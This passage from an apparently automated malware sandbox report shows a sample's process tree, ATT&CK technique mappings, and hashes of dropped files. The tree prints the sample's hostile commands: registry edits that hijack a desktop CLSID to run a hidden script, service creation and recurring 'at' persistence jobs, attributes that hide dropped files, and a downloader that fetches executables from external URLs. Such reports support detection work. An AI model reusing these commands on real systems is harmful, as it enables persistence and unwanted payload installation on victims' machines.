        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f
        5⤵
        Modifies registry class
        
        PID:4600
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f
        5⤵
        Modifies registry class
        
        PID:3320
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\shell"
        5⤵
        Modifies registry class
        
        PID:3216
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f
        5⤵
        Modifies registry class
        
        PID:4336
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)"
        5⤵
        Modifies registry class
        
        PID:1848
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f
        5⤵
        Modifies registry class
        
        PID:4820
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)\Command"
        5⤵
        Modifies registry class
        
        PID:2768
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "wscript.exe c:\progra~1\software\Microsoft\win.vbs" /f
        5⤵
        Modifies registry class
        
        PID:4616
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\shell\╩⌠╨╘(&R)"
        5⤵
        Modifies registry class
        
        PID:1712
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\shell\╩⌠╨╘(&R)\Command"
        5⤵
        Modifies registry class
        
        PID:5028
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "rundll32.exe shell32.dll,Control_RunDLL INETCPL.CPL,,0" /f REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\ShellFolder"
        5⤵
        
        PID:1664
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry class
        
        PID:4592
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f
        5⤵
        Modifies registry class
        
        PID:720
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f
        5⤵
        Modifies registry class
        
        PID:1328
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000208-0000-0010-8000-00AA006DAAAA}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f
        5⤵
        Modifies registry class
        
        PID:4952
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C .\runonce.cmd
      4⤵
      PID:2112
    - - C:\Windows\SysWOW64\sc.exe
        
        sc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"
        5⤵
        Launches sc.exe
        
        PID:2280
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config Schedule start= auto
        5⤵
        Launches sc.exe
        
        PID:2420
    - - C:\Windows\SysWOW64\net.exe
        
        net start "Task Scheduler"
        5⤵
        
        PID:4764
      - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start "Task Scheduler"
        6⤵
        
        PID:2924
    - - C:\Windows\SysWOW64\at.exe
        
        at 8:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000208-0000-0010-8000-00AA006DAAAA}"
        5⤵
        
        PID:2812
    - - C:\Windows\SysWOW64\at.exe
        
        at 11:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000208-0000-0010-8000-00AA006DAAAA}"
        5⤵
        
        PID:228
    - - C:\Windows\SysWOW64\at.exe
        
        at 14:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000208-0000-0010-8000-00AA006DAAAA}"
        5⤵
        
        PID:4656
    - - C:\Windows\SysWOW64\at.exe
        
        at 17:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000208-0000-0010-8000-00AA006DAAAA}"
        5⤵
        
        PID:1356
    - - C:\Windows\SysWOW64\at.exe
        
        at 21:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000208-0000-0010-8000-00AA006DAAAA}"
        5⤵
        
        PID:4416
    - - C:\Windows\SysWOW64\at.exe
        
        at 23:00 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{00000208-0000-0010-8000-00AA006DAAAA}"
        5⤵
        
        PID:3192
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C .\360.cmd
      4⤵
      Drops file in Program Files directory
      PID:4276
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C .\fav.cmd
      4⤵
      Drops file in Program Files directory
      PID:3100
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C .\copy.cmd
      4⤵
      Drops file in Program Files directory
      PID:4932
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +r +h +s "C:\Program Files\software\Microsoft\win.vbs"
        5⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:3180
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +r +h +s "C:\Program Files\software\fav\fav.cmd"
        5⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:1904
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +r +h +s "C:\Program Files\software\360SE.vbs"
        5⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:3316
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +r +h +s "C:\Program Files\software\36OSE.vbs"
        5⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:4600
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +r +h +s "C:\Program Files\software\tool.cmd"
        5⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:4676
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +r +h +s "C:\Program Files\software\360.cmd"
        5⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:2876
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +r +h +s "C:\Program Files\software\361.cmd"
        5⤵
        Sets file to hidden
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:5044
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C .\cpa.cmd
      4⤵
      PID:4456
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe
        
        ".\msn.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1712
      - C:\Users\Admin\AppData\Local\Temp\RarSFX1\pRaf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\pRaf.exe" "http://download.youbak.com/msn/software/partner/36a.exe"
        6⤵
        Executes dropped EXE
        
        PID:1220
      - C:\Users\Admin\AppData\Local\Temp\RarSFX1\pRaf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\pRaf.exe" "http://soft.downxiazai.info/soft/YoudaoDict_zhusha_quantui_001.exe"
        6⤵
        Executes dropped EXE
        
        PID:3536
      - C:\Users\Admin\AppData\Local\Temp\RarSFX1\pRaf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\pRaf.exe" "http://www.xunlei6x.com/msn/software/partner/1/chic7.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3892
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del .\runonce.cmd
      4⤵
      PID:3112
- C:\Windows\SysWOW64\wscript.exe
  "wscript.exe" C:\Users\Admin\AppData\Local\Temp\123.vbs
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2240
- - C:\Windows\SysWOW64\wscript.exe
    "C:\Windows\System32\wscript.exe" c:\progra~1\Tencent\QQUpadate\main.js
    3⤵
    PID:2668
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C c:\progra~1\Tencent\QQUpadate\myat.cmd
    3⤵
    PID:3080

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\CE981.exe

Filesize
398KB

MD5
0c75f2d9bb536869adc7c3d7c1b6939f

SHA1
2b20e31347baf077bb5e38cf46dc3c0baf0b1e31

SHA256
e8fd561fd81f1d584af63af682a60c243a834e21d4d13b807d96351f23c6ec6a

SHA512
0c96bc8e8defb9138fac0db45b361318c31fdb67c43835e652a9802b1f1de76307fbf8b049edf241145188878bdb6a21561273023053cab73a70d7e6cf91326a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\J3U83TL1\suggestions[1].en-US

Filesize
17KB

MD5
5a34cb996293fde2cb7a4ac89587393a

SHA1
3c96c993500690d1a77873cd62bc639b3a10653f

SHA256
c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

SHA512
e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\0_chic7.exe

Filesize
794B

MD5
1bc415b31cdff50d79ea2a3d7b4ff2c1

SHA1
f5ebab61deebc3d7a4a6676a23b982f1418ae6a6

SHA256
582ea6421c80adc1de2dcb34fb8db1926e34b49219d99306693166a6b268d412

SHA512
ee9718e829fa7c6b2e3b208fe99acd390d704a4ad037fd9b5ae231db184f48146792fb1ac028a69224ddca2c3195ef2aa5353ee6bc7abe01157773f4a6e50e84

Download Submit
C:\Users\Admin\AppData\Local\Temp\123.vbs

Filesize
232B

MD5
a13900ff5799a84be94db6cffc51ea47

SHA1
2700f56a4cd48f478e8af20f130aeaaa84abf854

SHA256
f2bc775851e5e7ab2082356c741b75b9ea5ef5cfc5a39144558c67633604baae

SHA512
74ec2cfd670a571d16884f46a5c67d733adf6ecc1d1dc9b763f7e909057ddae8db29b58c7b0caa50e9b5ebb73cbdb394bc88a9927f50bdd36e39018dfcbbe239

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\360.cmd

Filesize
1KB

MD5
ff9a3f5f87b9227acdf8c08482bd722a

SHA1
140a90a6f122c482aad0534f86c4939923807ccd

SHA256
a70d151c858a9ce50846784db0a8af1ce33949a6c9ab7da5f15b7fefc7b4582f

SHA512
c1c28a77aee5b026576fe6b87da51233039a261a57f1b8f844db4115f50b982d70ab0ca31a739281ecc76f1cc10655f242870963de0a72c7360f44aa8304d4eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\360SE.vbs

Filesize
187B

MD5
dc5f8958cfa7fddcde52876366e5903e

SHA1
cdbcb623494abfb34deec3cf82a5077b789a8101

SHA256
a315b89bc3dc4e90ac23e1b2de674033f713d251fa211fd30843663a996ad303

SHA512
8640bf96c369fe2863906b3f0b192f38fc8cac21e7e73ca20fda8e829e97a696a6f4c5b8c740363ae93373e8457f84514f0a9b9d318974fbe3be5d58fa3c2b0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\361.cmd

Filesize
412B

MD5
dfb2f0357cc6cf2ca3c305309b96817d

SHA1
2783afb8c0fb7e86450c18ef1b1000a41615d506

SHA256
9ee1f0bd8b7635dda544a0884c311117849a2a222511e56f502f6840dd890cdf

SHA512
32afe2b7e26592862c2e820cb88a3224c4749299a805bf4a74fc1e129d78011a8269d23c5f23b26981e4f2681097e2a5daca806b164f21c20e8937a7893089c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\36OSE.vbs

Filesize
178B

MD5
622434c2fa54c63478409029ff1bab67

SHA1
6ee57594e62d40b55fe957f50f9e2695a9d59dbe

SHA256
60d063dc4ec0904500c5ec3767b8c192f0d4f7e7bad21d8c5c6e37686bb26b83

SHA512
c4dbad0239074975ae701ef5f69f7aa8481485f376506814a6cdf777c7539ea79e426d5b524b41b99c4bc6981e413ca964ce34952dcf281364c0eb9d7e14c2dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\36O安全浏览器 3.lnk

Filesize
657B

MD5
d507cdb959d9fed4893eb148d3346169

SHA1
c8db177f03f89e4a741127b1014a3858dad02de1

SHA256
46f8f0e080e7f8151cdd6de234cff828ed8bc9c76218448335629568faa79ad4

SHA512
fb22e74672af01ef42c3dd9bbec2c097ecb20823015181c7d11a732c4cb767299fdd7f25db6f593813b772cf86ded652fc0ce13291c8c9c83fd2bad8d0004bbb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\36O安全浏览器 3.lnk

Filesize
1KB

MD5
7780bce2b144e791985b98586db03ff1

SHA1
e4277617c25db8faeba78460b3582a5ff8eca1e2

SHA256
c3cb5a90723612cc745dacb79d0c98b2d2d33e07fd50ed9842fcaf192d5ce4ce

SHA512
32e13b0c68826221160c72e40ff26ca17b85d5efafd58dcf96e708eb5f2c2f12c3264a174f8eaefa819c162e82414071b4d04ea34250f1aa4cefb8fb5cd29904

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Internet Expl0rer.lnk

Filesize
104B

MD5
73ba20bc4e2d0661f15e5a2dd6de3c04

SHA1
f2b6574def63ac137703e7ada022269ae46872f0

SHA256
fce51b33ffd52b09ffabada3ac9bfc674b90297b636cf1b1b3225f2e911234de

SHA512
95639abe5b376f7bf977dc100eafe2f3efbea8ec5f39b61ad8cfe6ea9c49d8a12a57a71e88a641c4961a0274b9ae95a226e5b108c93c53852a9bff7ef3a34fca

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\copy.cmd

Filesize
2KB

MD5
9af6d72a518895b618845587ebc1da1e

SHA1
be728eb9d5bc8a7646f303c6c13415398ba566cd

SHA256
a8e8e32f6d09a4258e804b0c15ffcac3009009e7fe403919391bbc24480b802d

SHA512
d2fbf3fbcab9279824750aa2a5efe9ef6cd0e2406ea22c13784a0ebdf150c9137ed1b19fef40722690ca98c240544a9fb74bb95bb22b53fa258dc1b95cd16f04

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cpa.cmd

Filesize
37B

MD5
d102d7237ff395378654c928b119dff0

SHA1
9ac16a1749212cc8e3cf6606fc7fcbd05f750c61

SHA256
702527cd5541e09286da5e1f47f829798c6e703b1c72c97db5570d1744337f48

SHA512
cc9a17882cc48c541bd3561d2a71a4a3b75b43e07050a0c5a36e02aba78b647c6d87e392a99c60373a7ec7d034031d7cfadef06e75c91cc2f19ff280207a15f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\dodo.vbs

Filesize
872B

MD5
b14edccbff6659d1517131d881e1f27c

SHA1
5e8de433038c86b369ffed5100c1766e21609aeb

SHA256
e968464c26d1c7b4777c350c4741a5bf82b0b88140268eccc3ebb5be581d62e9

SHA512
45268dbe29f0e932a1f1ff08df7e4d24e3febb8631627acdd9a3bb6ff2ab08f049b7a789c399f3cef3d82cc643f88acf4391542808c8d42f7932ef34def9d2c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\fav.cmd

Filesize
326B

MD5
29c044a690d5494a121d7a6b6d30da3d

SHA1
c2e78d6813912c0d5a891ca8f66fe3bfd050ab9a

SHA256
978de380212914478b05d3196d9bedce918b763059d94bca1c5e2b0adc094abe

SHA512
a928b5742c57b4c2e95d1231ca418256bba240274e072f9bf1388aba9d5d1dfe93f3e1044acac13d41f02c2c68912d910fd74a9966271fa08e3ff59b796ad826

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe

Filesize
346KB

MD5
edd010c804e86b81139a46a84c2fe1a1

SHA1
c74d00142ec90c1ae64f8c97860aedebd96171db

SHA256
904535dc6067a2731ab95f91e37bf2c0cd2e6d723238b737f9c463ee2c6e1b19

SHA512
849db7e809b7c7496f8b59c0a18097b140b50b160f6e7efd8a744c7492955f348e8b85a273c5b506dd2d19333418031f34e42b080dc9aaaab5b2bdae6b7f6368

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\runonce.cmd

Filesize
1KB

MD5
07adc213ef327cc36596fdeae2d15b71

SHA1
182ad8087277bfcd3355938aeaa1b0f95e72c5ec

SHA256
931e386b3c0bae2cc146232bcbbe2c7f1a996e55eaa695016e6abae978cd28a2

SHA512
989ac7ba83ac25ca0167ff8ef78a789a9ae9d2486a9fd3ffae34a8c33b0c14d109c58e3c3879780e088e4782ca433ed628bd032555b98cf222c4e047d224edcb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup_free_7xdown.vbs

Filesize
1KB

MD5
f619143d5431d92ee67e6e25605cced0

SHA1
ea6b3551be8cf9b348cd458396131e54459ad5c7

SHA256
854e2a56231e24bb527a8630b4a3432fe14dac041c87ac99e1c1786d5ee111a4

SHA512
8f56509de54e6decdd726d6b0227ba44dc91367ca500529afda30d73fe7ac47706a22a4c74f5d2fb997c3f9558c7e543fc58f3341ec82d4540b54a83ff856497

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\tao.ico

Filesize
16KB

MD5
4a085369ed417129dbf07e9c2dbe06bc

SHA1
0bcb813686eccf8cdc7921232fd3ff6c2a023af8

SHA256
c6031d14a1e77542c3c46941d3c296e81206e6f2bc09c4b621a66732ae80e6dc

SHA512
0539d5b4cd84a8f5964f9fb63f22b5b87fc31ae50239bcf3fd431db8a29c15f333f004b31c98fd10d965aa1b3b999f92bf7222286a64fec627aa770954515892

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\tj.cmd

Filesize
1KB

MD5
8ec297c435dc038b194aa9f47569d67f

SHA1
7b281655108ddef336a07a66c839dc58fdc58af6

SHA256
68aaa616b8d97c93c193cb402ee089b201344098faaea24454b6876e88a73f6c

SHA512
0b29992092ed5f5d83bde0225df1f782cb0f3001058f72d71c80a94a905a82616b60fff4ba1bd95e8f929e0f45e118fefcdd0e3fd596722d440c785a986378aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\tool.cmd

Filesize
3KB

MD5
0750d9f23fbcdc733c28f3630445883c

SHA1
f050868faca5d4de8240032d30c70d056dcc8f7a

SHA256
f28c19f2607ddfc7da0a4ffb1d0a8f75be332b837ee5c023a9ee03f441bd0537

SHA512
7123e6c897a76598165412337ecd4d96966b316cbd591e9f53beeef74af2dce41240f4855b47905a19f22c3446e26069fa8037a46d828469fbe1d08b98765ae7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ware.vbs

Filesize
999B

MD5
fe92621512d8be7ee48d85fdb98332fb

SHA1
542f446624b19e210f50cde31f393096f4d8e56b

SHA256
cf63484940408fba9f6d85d3638c720086137162ab02b1ea81b3f5198df3079f

SHA512
82136d625c789e4c906acda3831d8dd77088f26282b79f792c6ad19a9210e2b501fe67f517c704e18ecbaa7cc7d601b29151a559086242fa4f953684c5347b8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\win.vbs

Filesize
158B

MD5
799040b2e2210663aa8769cf10cd8aeb

SHA1
9bb5a87e17374e3f564ba2d76904a530b2fccb4c

SHA256
40b3dd93ff6ff4dc891f17a827dbd66e82963eaf00a3ed5777c5acc8c3dba3ac

SHA512
e372517ebd0ef518df7dc0b477b7d18105db1c48dad11ccca3d8dbc3a952f9892e812bd0dee06999dec7e5c22502baf23e83bdf249132be8f7f712e42678b421

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\淘宝购物.url

Filesize
189B

MD5
63f72e0adad2913f0616ac0304e07b0c

SHA1
5af6726532b9cf9c17641d43e1d057ffdb33de18

SHA256
bdb784a299056e551ffecf5402e49f99a5ad988c1b6456f03a9450f210775845

SHA512
e6021a009591273b3bea14dde6d0332dbff09ff921f43f10d55c83ba615d3d313d4f32b648c2dfe531b4ca9eda465e6b07b43b02b558252ac56517c3cb0c0b17

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\网址导航.url

Filesize
81B

MD5
97c3f90dfc6b49091e3b0ac2f4c5081e

SHA1
1308208ed83e3682e9d2d8e4756c889e8a652cc2

SHA256
9a66e3c8845ef59301b675977c8c7023fa61bd3a051f6c34039eaad62a43af1b

SHA512
ee68548709f725ef3a78d7159261640e6c0503bcc278788e28e1925330741ac11283cfff9ee62716210691b93dbb58eccd249f2235b23eaa1d52e8eb49cc10b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\软件下载.url

Filesize
83B

MD5
e37d61e59cabe1cb70c4c3621eedb6f2

SHA1
744c090f60fd5c2c95486ce5aa9ca721df94bd23

SHA256
981ef6de8d54f921744ae45bc289616186ac6a1e05ad4fec0471efc768f5dee1

SHA512
2f396e56f238933a6078961bf943037bb0b95251cd65cb86d7bbf46b9b078c9e061ef691a5848eb9aebb6154f5528b7d59a7cfab601646a1c58a82e8cf8004cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\pRaf.exe

Filesize
249KB

MD5
9d0581db19194837efe6657f93283bc5

SHA1
beaef0703dfa354b70ca4879158ba193cea4e30e

SHA256
7b890d6d8f89ed063c95e897c5106e9a3c9fbf90d82dc89fd963f808fd077933

SHA512
cb6a8d719401bfd533168f44ece93b670ba1c2614132a16c02ace92eeaa017e9fa7d008d9fd084058167cff37872e809bb076be20fb85210a5fef3a16f8c9d08

Download Submit
memory/1220-135-0x0000000000400000-0x00000000004D5000-memory.dmp

Filesize
852KB

Download
memory/1220-127-0x0000000000670000-0x0000000000671000-memory.dmp

Filesize
4KB

Download
memory/1220-126-0x0000000000620000-0x0000000000622000-memory.dmp

Filesize
8KB

Download
memory/1220-124-0x0000000000400000-0x00000000004D5000-memory.dmp

Filesize
852KB

Download
memory/1712-155-0x0000000000400000-0x0000000000423000-memory.dmp

Filesize
140KB

Download
memory/1712-153-0x0000000000400000-0x0000000000423000-memory.dmp

Filesize
140KB

Download
memory/3536-140-0x0000000000400000-0x00000000004D5000-memory.dmp

Filesize
852KB

Download
memory/3536-139-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/3536-138-0x00000000020D0000-0x00000000020D2000-memory.dmp

Filesize
8KB

Download
memory/3536-137-0x0000000000400000-0x00000000004D5000-memory.dmp

Filesize
852KB

Download
memory/3892-154-0x0000000000400000-0x00000000004D5000-memory.dmp

Filesize
852KB

Download
memory/3892-143-0x00000000022D0000-0x00000000022D1000-memory.dmp

Filesize
4KB

Download
memory/3892-142-0x00000000005F0000-0x00000000005F2000-memory.dmp

Filesize
8KB

Download